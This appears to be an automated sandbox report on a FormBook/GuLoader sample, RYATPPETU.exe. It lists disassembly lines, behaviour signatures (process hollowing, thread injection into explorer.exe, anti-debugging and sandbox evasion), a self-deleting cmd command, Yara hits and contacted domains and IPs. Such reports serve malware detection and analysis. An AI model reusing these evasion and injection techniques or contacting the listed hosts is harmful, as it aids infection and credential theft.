Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h] 15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05052073 mov eax, dword ptr fs:[00000030h] 15_2_05052073
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCA185 mov eax, dword ptr fs:[00000030h] 15_2_04FCA185
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBC182 mov eax, dword ptr fs:[00000030h] 15_2_04FBC182
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h] 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h] 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h] 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h] 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05013884 mov eax, dword ptr fs:[00000030h] 15_2_05013884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05013884 mov eax, dword ptr fs:[00000030h] 15_2_05013884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9B171 mov eax, dword ptr fs:[00000030h] 15_2_04F9B171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9B171 mov eax, dword ptr fs:[00000030h] 15_2_04F9B171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBC577 mov eax, dword ptr fs:[00000030h] 15_2_04FBC577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBC577 mov eax, dword ptr fs:[00000030h] 15_2_04FBC577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9C962 mov eax, dword ptr fs:[00000030h] 15_2_04F9C962
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB7D50 mov eax, dword ptr fs:[00000030h] 15_2_04FB7D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD3D43 mov eax, dword ptr fs:[00000030h] 15_2_04FD3D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBB944 mov eax, dword ptr fs:[00000030h] 15_2_04FBB944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBB944 mov eax, dword ptr fs:[00000030h] 15_2_04FBB944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC513A mov eax, dword ptr fs:[00000030h] 15_2_04FC513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC513A mov eax, dword ptr fs:[00000030h] 15_2_04FC513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h] 15_2_04FC4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h] 15_2_04FC4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h] 15_2_04FC4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9AD30 mov eax, dword ptr fs:[00000030h] 15_2_04F9AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05068CD6 mov eax, dword ptr fs:[00000030h] 15_2_05068CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov ecx, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h] 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h] 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h] 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h] 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 mov ecx, dword ptr fs:[00000030h] 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h] 15_2_05016CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h] 15_2_05016CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h] 15_2_05016CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h] 15_2_04F99100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h] 15_2_04F99100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h] 15_2_04F99100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050514FB mov eax, dword ptr fs:[00000030h] 15_2_050514FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0506070D mov eax, dword ptr fs:[00000030h] 15_2_0506070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0506070D mov eax, dword ptr fs:[00000030h] 15_2_0506070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502FF10 mov eax, dword ptr fs:[00000030h] 15_2_0502FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502FF10 mov eax, dword ptr fs:[00000030h] 15_2_0502FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA76E2 mov eax, dword ptr fs:[00000030h] 15_2_04FA76E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2AE4 mov eax, dword ptr fs:[00000030h] 15_2_04FC2AE4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC16E0 mov ecx, dword ptr fs:[00000030h] 15_2_04FC16E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0505131B mov eax, dword ptr fs:[00000030h] 15_2_0505131B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC36CC mov eax, dword ptr fs:[00000030h] 15_2_04FC36CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2ACB mov eax, dword ptr fs:[00000030h] 15_2_04FC2ACB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD8EC7 mov eax, dword ptr fs:[00000030h] 15_2_04FD8EC7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAAAB0 mov eax, dword ptr fs:[00000030h] 15_2_04FAAAB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAAAB0 mov eax, dword ptr fs:[00000030h] 15_2_04FAAAB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCFAB0 mov eax, dword ptr fs:[00000030h] 15_2_04FCFAB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h] 15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h] 15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h] 15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h] 15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h] 15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05068B58 mov eax, dword ptr fs:[00000030h] 15_2_05068B58
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCD294 mov eax, dword ptr fs:[00000030h] 15_2_04FCD294
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCD294 mov eax, dword ptr fs:[00000030h] 15_2_04FCD294
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05068F6A mov eax, dword ptr fs:[00000030h] 15_2_05068F6A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0504D380 mov ecx, dword ptr fs:[00000030h] 15_2_0504D380
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD927A mov eax, dword ptr fs:[00000030h] 15_2_04FD927A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h] 15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h] 15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h] 15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h] 15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h] 15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0505138A mov eax, dword ptr fs:[00000030h] 15_2_0505138A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h] 15_2_05017794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h] 15_2_05017794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h] 15_2_05017794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA766D mov eax, dword ptr fs:[00000030h] 15_2_04FA766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05065BA5 mov eax, dword ptr fs:[00000030h] 15_2_05065BA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h] 15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h] 15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h] 15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h] 15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050153CA mov eax, dword ptr fs:[00000030h] 15_2_050153CA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050153CA mov eax, dword ptr fs:[00000030h] 15_2_050153CA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD4A2C mov eax, dword ptr fs:[00000030h] 15_2_04FD4A2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD4A2C mov eax, dword ptr fs:[00000030h] 15_2_04FD4A2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9E620 mov eax, dword ptr fs:[00000030h] 15_2_04F9E620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCA61C mov eax, dword ptr fs:[00000030h] 15_2_04FCA61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCA61C mov eax, dword ptr fs:[00000030h] 15_2_04FCA61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB3A1C mov eax, dword ptr fs:[00000030h] 15_2_04FB3A1C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h] 15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F95210 mov ecx, dword ptr fs:[00000030h] 15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h] 15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h] 15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9AA16 mov eax, dword ptr fs:[00000030h] 15_2_04F9AA16
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9AA16 mov eax, dword ptr fs:[00000030h] 15_2_04F9AA16
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA8A0A mov eax, dword ptr fs:[00000030h] 15_2_04FA8A0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h] 15_2_04F9C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h] 15_2_04F9C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h] 15_2_04F9C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC8E00 mov eax, dword ptr fs:[00000030h] 15_2_04FC8E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD37F5 mov eax, dword ptr fs:[00000030h] 15_2_04FD37F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051608 mov eax, dword ptr fs:[00000030h] 15_2_05051608
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBDBE9 mov eax, dword ptr fs:[00000030h] 15_2_04FBDBE9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h] 15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h] 15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h] 15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h] 15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h] 15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h] 15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0504FE3F mov eax, dword ptr fs:[00000030h] 15_2_0504FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h] 15_2_04FC4BAD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h] 15_2_04FC4BAD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h] 15_2_04FC4BAD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05024257 mov eax, dword ptr fs:[00000030h] 15_2_05024257
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0504B260 mov eax, dword ptr fs:[00000030h] 15_2_0504B260
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0504B260 mov eax, dword ptr fs:[00000030h] 15_2_0504B260
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05068A62 mov eax, dword ptr fs:[00000030h] 15_2_05068A62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2397 mov eax, dword ptr fs:[00000030h] 15_2_04FC2397
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCB390 mov eax, dword ptr fs:[00000030h] 15_2_04FCB390
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA8794 mov eax, dword ptr fs:[00000030h] 15_2_04FA8794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA1B8F mov eax, dword ptr fs:[00000030h] 15_2_04FA1B8F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA1B8F mov eax, dword ptr fs:[00000030h] 15_2_04FA1B8F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502FE87 mov eax, dword ptr fs:[00000030h] 15_2_0502FE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC3B7A mov eax, dword ptr fs:[00000030h] 15_2_04FC3B7A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC3B7A mov eax, dword ptr fs:[00000030h] 15_2_04FC3B7A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9DB60 mov ecx, dword ptr fs:[00000030h] 15_2_04F9DB60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAFF60 mov eax, dword ptr fs:[00000030h] 15_2_04FAFF60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9F358 mov eax, dword ptr fs:[00000030h] 15_2_04F9F358
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05060EA5 mov eax, dword ptr fs:[00000030h] 15_2_05060EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05060EA5 mov eax, dword ptr fs:[00000030h] 15_2_05060EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05060EA5 mov eax, dword ptr fs:[00000030h] 15_2_05060EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050146A7 mov eax, dword ptr fs:[00000030h] 15_2_050146A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9DB40 mov eax, dword ptr fs:[00000030h] 15_2_04F9DB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAEF40 mov eax, dword ptr fs:[00000030h] 15_2_04FAEF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0504FEC0 mov eax, dword ptr fs:[00000030h] 15_2_0504FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCE730 mov eax, dword ptr fs:[00000030h] 15_2_04FCE730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05068ED6 mov eax, dword ptr fs:[00000030h] 15_2_05068ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F94F2E mov eax, dword ptr fs:[00000030h] 15_2_04F94F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F94F2E mov eax, dword ptr fs:[00000030h] 15_2_04F94F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBF716 mov eax, dword ptr fs:[00000030h] 15_2_04FBF716
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCA70E mov eax, dword ptr fs:[00000030h] 15_2_04FCA70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCA70E mov eax, dword ptr fs:[00000030h] 15_2_04FCA70E
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BC135 LdrInitializeThunk, 0_2_022BC135

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.etr6safvu8.com
Source: C:\Windows\explorer.exe Domain query: www.lrbounee.xyz
Source: C:\Windows\explorer.exe Network Connect: 172.67.161.80 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\RYATPPETU.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: E90000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\RYATPPETU.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\RYATPPETU.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\RYATPPETU.exe Thread register set: target process: 3472 Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Thread register set: target process: 3472 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3472 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RYATPPETU.exe Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe' Jump to behavior
Source: explorer.exe, 0000000C.00000000.603358664.0000000005EA0000.00000004.00000001.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000000C.00000000.572074802.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information:

barindex
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: RYATPPETU.exe PID: 2248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmmon32.exe PID: 5516, type: MEMORYSTR
Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 510462 Sample: RYATPPETU.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 8 other signatures 2->40 10 RYATPPETU.exe 1 1 2->10         started        process3 signatures4 54 Tries to detect Any.run 10->54 56 Tries to detect virtualization through RDTSC time measurements 10->56 58 Hides threads from debuggers 10->58 13 RYATPPETU.exe 6 10->13         started        process5 dnsIp6 32 blumeconstructionllc.com 45.82.177.176, 443, 49697 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Netherlands 13->32 60 Modifies the context of a thread in another process (thread injection) 13->60 62 Tries to detect Any.run 13->62 64 Maps a DLL or memory area into another process 13->64 66 3 other signatures 13->66 17 explorer.exe 13->17 injected signatures7 process8 dnsIp9 28 www.lrbounee.xyz 172.67.161.80, 49698, 80 CLOUDFLARENETUS United States 17->28 30 www.etr6safvu8.com 17->30 42 System process connects to network (likely due to code injection or exploit) 17->42 44 